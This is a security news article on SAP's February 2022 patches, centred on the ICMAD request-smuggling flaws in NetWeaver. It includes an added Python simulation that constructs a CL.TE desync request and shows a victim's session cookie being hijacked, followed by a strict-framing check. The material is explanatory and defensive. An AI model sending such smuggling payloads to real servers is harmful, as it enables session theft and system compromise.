SAP Customers Warned About Critical ‘ICMAD’ Vulnerabilities
As part of its February 2022 Security Patch Day, German software maker SAP has announced the release of 13 new security notes and updates for five other security notes.
Counting an out-of-band note, that makes 19 security notes; three further notes released or updated since January's Patch Day bring the total to 22.
Eight of the 22 security notes carry the ‘Hot News’ rating, the highest in the company’s books and a record number for a single Patch Day. However, four of these are updates to previously released security notes.
Three of the newly released Hot News security notes have a CVSS score of 10, while the fourth has a CVSS score of 9.1. All of the updated Hot News notes have a CVSS score of 10.
The most important of these vulnerabilities is CVE-2022-22536, a request smuggling and request concatenation issue in NetWeaver, Content Server and Web Dispatcher that could be abused to compromise any NetWeaver-based Java or ABAP application running the default configuration.
The vulnerability can be exploited with a single request delivered through the commonly exposed HTTP(S) service, without authentication, business application security firm Onapsis explains. An attacker could steal the victim’s session and credentials in plain text.
Onapsis warns that CVE-2022-22536 can be exploited in combination with a high-severity HTTP request smuggling vulnerability (CVE-2022-22532) to compromise NetWeaver Java systems.
Together with CVE-2022-22533, these flaws are collectively referred to as ICMAD because they reside in the Internet Communication Manager (ICM), the component that handles HTTP(S) traffic for many SAP applications.
“CVE-2022-22536 is exploitable when an HTTP(S) proxy is sitting in between clients and the backend SAP system, which is the most common scenario for HTTP(S) access in any productive landscape. The Onapsis Research Labs validated that attackers could also exploit CVE-2022-22532 […] in the absence of a proxy. The combination of both vulnerabilities makes it possible to compromise SAP NetWeaver Java systems regardless of the use of proxies,” Onapsis says.
The security company also warns that attacks targeting ICMAD are hard to detect, since malicious requests are difficult to differentiate from benign ones, and underlines that successful exploitation requires no prior authentication and leads to complete system takeover.
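To make the "request smuggling and request concatenation" class concrete, the following added example (written for this article; it is not Onapsis's scanner or SAP's code, and it does not reproduce the ICM bug itself) models a permissive front-end proxy and a backend that frame HTTP/1.1 messages differently. A single attacker request that is well-formed in the proxy's eyes leaves unconsumed bytes in the backend's buffer, and the next client's request is concatenated onto them, so that the victim's session cookie arrives on a request line the attacker chose. The host name, URL paths, cookie name and value are constructed for the illustration. The `framing_is_ambiguous` check at the end is the kind of strict-parsing rule a front-end should apply to this class in general.

```python
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Added illustration of the HTTP request-smuggling / request-concatenation class.
# It models a sloppy front-end proxy and a backend that disagree about message
# framing; it does NOT model the SAP ICM internals behind ICMAD.


@dataclass
class Request:
    method: str
    target: str
    headers: List[Tuple[str, str]] = field(default_factory=list)  # wire order
    body: bytes = b""

    def header(self, name: str) -> Optional[str]:
        for k, v in self.headers:
            if k.lower() == name.lower():
                return v
        return None


def _read_chunked(buf: bytes, pos: int) -> Tuple[bytes, int]:
    """Decode a chunked body starting at pos; return (body, position after terminator)."""
    body = b""
    while True:
        line_end = buf.index(b"\r\n", pos)
        size = int(buf[pos:line_end].split(b";")[0], 16)
        pos = line_end + 2
        if size == 0:
            # Skip trailer lines up to and including the empty line.
            while True:
                line_end = buf.index(b"\r\n", pos)
                line, pos = buf[pos:line_end], line_end + 2
                if not line:
                    return body, pos
        body += buf[pos:pos + size]
        pos += size + 2  # chunk data is followed by CRLF


def parse_stream(buf: bytes, framing: str) -> List[Request]:
    """Split one connection's bytes into requests.
    framing="cl": honour Content-Length, ignore Transfer-Encoding (sloppy proxy).
    framing="te": honour Transfer-Encoding: chunked when present (backend)."""
    reqs, pos = [], 0
    while pos < len(buf):
        end = buf.find(b"\r\n\r\n", pos)
        if end < 0:
            break  # incomplete header block; a real server would wait for more bytes
        lines = buf[pos:end].decode("latin-1").split("\r\n")
        method, target, _version = lines[0].split(" ", 2)
        headers = []
        for ln in lines[1:]:
            k, _, v = ln.partition(":")
            headers.append((k.strip(), v.strip()))
        req = Request(method, target, headers)
        pos = end + 4
        te = req.header("Transfer-Encoding")
        if framing == "te" and te and te.lower() == "chunked":
            req.body, pos = _read_chunked(buf, pos)
        else:
            n = int(req.header("Content-Length") or 0)
            req.body, pos = buf[pos:pos + n], pos + n
        reqs.append(req)
    return reqs


def framing_is_ambiguous(headers: List[Tuple[str, str]]) -> bool:
    """True when two conforming parsers could disagree on where the message ends:
    Content-Length together with Transfer-Encoding, or more than one Content-Length."""
    cls = [v for k, v in headers if k.lower() == "content-length"]
    has_te = any(k.lower() == "transfer-encoding" for k, _ in headers)
    return (has_te and bool(cls)) or len(cls) > 1


def demo() -> Tuple[List[Request], List[Request]]:
    """Constructed traffic: one attacker request, then one victim request, forwarded
    over the same proxy-to-backend connection. Returns (proxy_view, backend_view)."""
    smuggled = b"GET /steal HTTP/1.1\r\nFoo: "  # deliberately left unterminated
    body = b"0\r\n\r\n" + smuggled              # empty chunked body, then the prefix
    attacker = (
        b"POST / HTTP/1.1\r\nHost: sap.example\r\n"
        + b"Content-Length: %d\r\n" % len(body)  # covers the whole body for the proxy
        + b"Transfer-Encoding: chunked\r\n\r\n"  # backend stops at the 0 chunk
        + body
    )
    victim = (
        b"GET /account HTTP/1.1\r\nHost: sap.example\r\n"
        b"Cookie: SAP_SESSIONID=victim-session-constructed\r\n\r\n"
    )
    stream = attacker + victim
    return parse_stream(stream, "cl"), parse_stream(stream, "te")


if __name__ == "__main__":
    proxy_view, backend_view = demo()
    print("proxy sees:  ", [(r.method, r.target) for r in proxy_view])
    print("backend sees:", [(r.method, r.target) for r in backend_view])
    print("victim cookie now rides on", backend_view[1].target,
          "->", backend_view[1].header("Cookie"))
    print("strict front-end would reject attacker request:",
          framing_is_ambiguous(proxy_view[0].headers))
```

Both requests look unremarkable to the proxy, which is the detection problem the article describes: nothing in its log distinguishes the attacker's POST from ordinary traffic, yet the backend has already processed a second request whose path the attacker controls and whose Cookie header belongs to the victim. Rejecting any request whose framing is ambiguous at the first hop removes this particular desync; it is a general hygiene rule for HTTP intermediaries, not a substitute for the SAP patches.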
By exploiting these vulnerabilities, attackers can steal user credentials and personal information, exfiltrate sensitive information, perform fraudulent financial transactions, disrupt critical systems and cause denial of service conditions, or change banking details in a financial system of record, Onapsis explains.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has urged organizations to apply the patches for the ICMAD flaws as soon as possible.
Two other Hot News security notes address remote code execution issues related to the use of Apache Log4j in SAP Commerce and Data Intelligence 3 (on-premise), respectively.
The last of this month’s Hot News security notes addresses a missing segregation of duties in Solution Manager Diagnostics Root Cause Analysis Tools (CVE-2022-22544, CVSS score of 9.1) that could allow an attacker with admin privileges to browse files and execute code on all Diagnostics Agents over the network, Onapsis explains.
Three of the updated Hot News security notes also deal with Log4j vulnerabilities, while the fourth brings Chromium release 97.0.4692.99 to SAP Business Client.
SAP also patched an SQL injection flaw in NetWeaver AS ABAP (Workplace Server) that could allow an attacker to execute crafted database queries, and updated a security note dealing with two vulnerabilities in the F0743 Create Single Payment application of S/4HANA.
Six medium-severity bugs were addressed this month in NetWeaver, ERP HCM, Business Objects Web Intelligence (BI Launchpad), 3D Visual Enterprise Viewer, Adaptive Server Enterprise, and S/4HANA. SAP also patched a low-severity denial of service in NetWeaver Application Server for ABAP and ABAP Platform.